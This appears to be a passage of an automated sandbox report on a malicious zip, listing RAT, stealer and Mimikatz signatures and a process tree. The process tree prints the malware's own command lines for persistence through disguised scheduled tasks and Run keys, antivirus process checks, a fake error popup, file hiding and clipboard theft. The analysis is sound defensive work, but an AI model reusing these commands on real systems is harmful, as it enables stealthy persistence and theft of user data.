Analysis Overview
SHA256
e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1
Threat Level: Known bad
The file 4363463463464363463463463.exe.zip was found to be: Known bad.
Malicious Activity Summary
Quasar family
Suspicious use of NtCreateUserProcessOtherParentProcess
Exela Stealer
Mimikatz family
Phorphiex payload
Quasar payload
Phorphiex, Phorpiex
Phorphiex family
Exelastealer family
Mimikatz
Quasar RAT
Grants admin privileges
mimikatz is an open source tool to dump credentials on Windows
Blocklisted process makes network request
Modifies Windows Firewall
Downloads MZ/PE file
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Clipboard Data
Adds Run key to start application
Command and Scripting Interpreter: PowerShell
Indicator Removal: File Deletion
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Network Service Discovery
Suspicious use of SetThreadContext
Enumerates processes with tasklist
Hide Artifacts: Hidden Files and Directories
Drops file in Windows directory
Launches sc.exe
System Network Configuration Discovery: Wi-Fi Discovery
Permission Groups Discovery: Local Groups
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
System Network Connections Discovery
NSIS installer
Runs net.exe
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Runs ping.exe
Suspicious use of SetWindowsHookEx
Collects information from the system
Gathers network information
Gathers system information
Suspicious behavior: GetForegroundWindowSpam
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Kills process with taskkill
Analysis: static1
Detonation Overview
Reported
2024-11-28 19:40
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-28 19:40
Reported
2024-11-28 20:00
Platform
win11-20241007-en
Max time kernel
1199s
Max time network
1202s
Signatures
Exela Stealer
Exelastealer family
Mimikatz
Mimikatz family
Phorphiex family
Phorphiex payload
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Grants admin privileges
mimikatz is an open source tool to dump credentials on Windows
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe" | C:\Users\Admin\Desktop\Files\win.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\2641813856.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\Desktop\Files\m.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Monster Update Service = "C:\\Users\\Admin\\AppData\\Local\\MonsterUpdateService\\Monster.exe" | C:\Windows\system32\reg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ARP.EXE | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\arp.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4444 set thread context of 3736 | N/A | C:\Users\Admin\Desktop\Files\PURLOG.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe |
| PID 2028 set thread context of 2732 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\conhost.exe |
| PID 2028 set thread context of 3176 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\dwm.exe |
| PID 3488 set thread context of 5064 | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\Files\m.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\Files\m.exe | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\2641813856.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1716412561.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1592010501.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\mimikatz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\ewrvuh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1259121635.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1431716774.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2603430756.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\up.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1888623094.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\PctOccurred.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\120131490.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\164314122.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\route.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2420715866.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2641813856.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\arp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\386833483.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\m.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\twztl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\win.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\pei.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
System Network Connections Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
NSIS installer
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Desktop\Files\up.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Desktop\Files\up.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Desktop\Files\up.exe | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs net.exe
Runs ping.exe
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe.zip"
C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
C:\Users\Admin\Desktop\Files\ewrvuh.exe
"C:\Users\Admin\Desktop\Files\ewrvuh.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\Files\PURLOG.exe
"C:\Users\Admin\Desktop\Files\PURLOG.exe"
C:\Users\Admin\Desktop\Files\m.exe
"C:\Users\Admin\Desktop\Files\m.exe"
C:\Users\Admin\Desktop\Files\test16.exe
"C:\Users\Admin\Desktop\Files\test16.exe"
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Users\Admin\Desktop\Files\up.exe
"C:\Users\Admin\Desktop\Files\up.exe"
C:\Users\Admin\AppData\Local\Temp\1809827666.exe
C:\Users\Admin\AppData\Local\Temp\1809827666.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Users\Admin\AppData\Local\Temp\2420715866.exe
C:\Users\Admin\AppData\Local\Temp\2420715866.exe
C:\Users\Admin\AppData\Local\Temp\1622938899.exe
C:\Users\Admin\AppData\Local\Temp\1622938899.exe
C:\Users\Admin\AppData\Local\Temp\164314122.exe
C:\Users\Admin\AppData\Local\Temp\164314122.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\Desktop\Files\PURLOG.exe' -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Users\Admin\AppData\Local\Temp\2603430756.exe
C:\Users\Admin\AppData\Local\Temp\2603430756.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
C:\Users\Admin\AppData\Local\Temp\1888623094.exe
C:\Users\Admin\AppData\Local\Temp\1888623094.exe
C:\Users\Admin\AppData\Local\Temp\1431716774.exe
C:\Users\Admin\AppData\Local\Temp\1431716774.exe
C:\Users\Admin\Desktop\Files\pei.exe
"C:\Users\Admin\Desktop\Files\pei.exe"
C:\Users\Admin\Desktop\Files\PctOccurred.exe
"C:\Users\Admin\Desktop\Files\PctOccurred.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit
C:\Users\Admin\Desktop\Files\built.exe
"C:\Users\Admin\Desktop\Files\built.exe"
C:\Users\Admin\AppData\Local\Temp\120131490.exe
C:\Users\Admin\AppData\Local\Temp\120131490.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AFtqGY9CJmsw.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 193997
C:\Windows\SysWOW64\findstr.exe
findstr /V "JulieAppMagneticWhenever" Hist
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
Restructuring.pif y
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KH8E5zcj0SFv.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\twztl.exe
"C:\Users\Admin\Desktop\Files\twztl.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xFBWy8CFEcYS.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\build11.exe
"C:\Users\Admin\Desktop\Files\build11.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2992_133772965421700862\stub.exe
C:\Users\Admin\Desktop\Files\build11.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /query /TN "MonsterUpdateService""
C:\Windows\system32\schtasks.exe
schtasks /query /TN "MonsterUpdateService"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f"
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\chcp.com
chcp
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
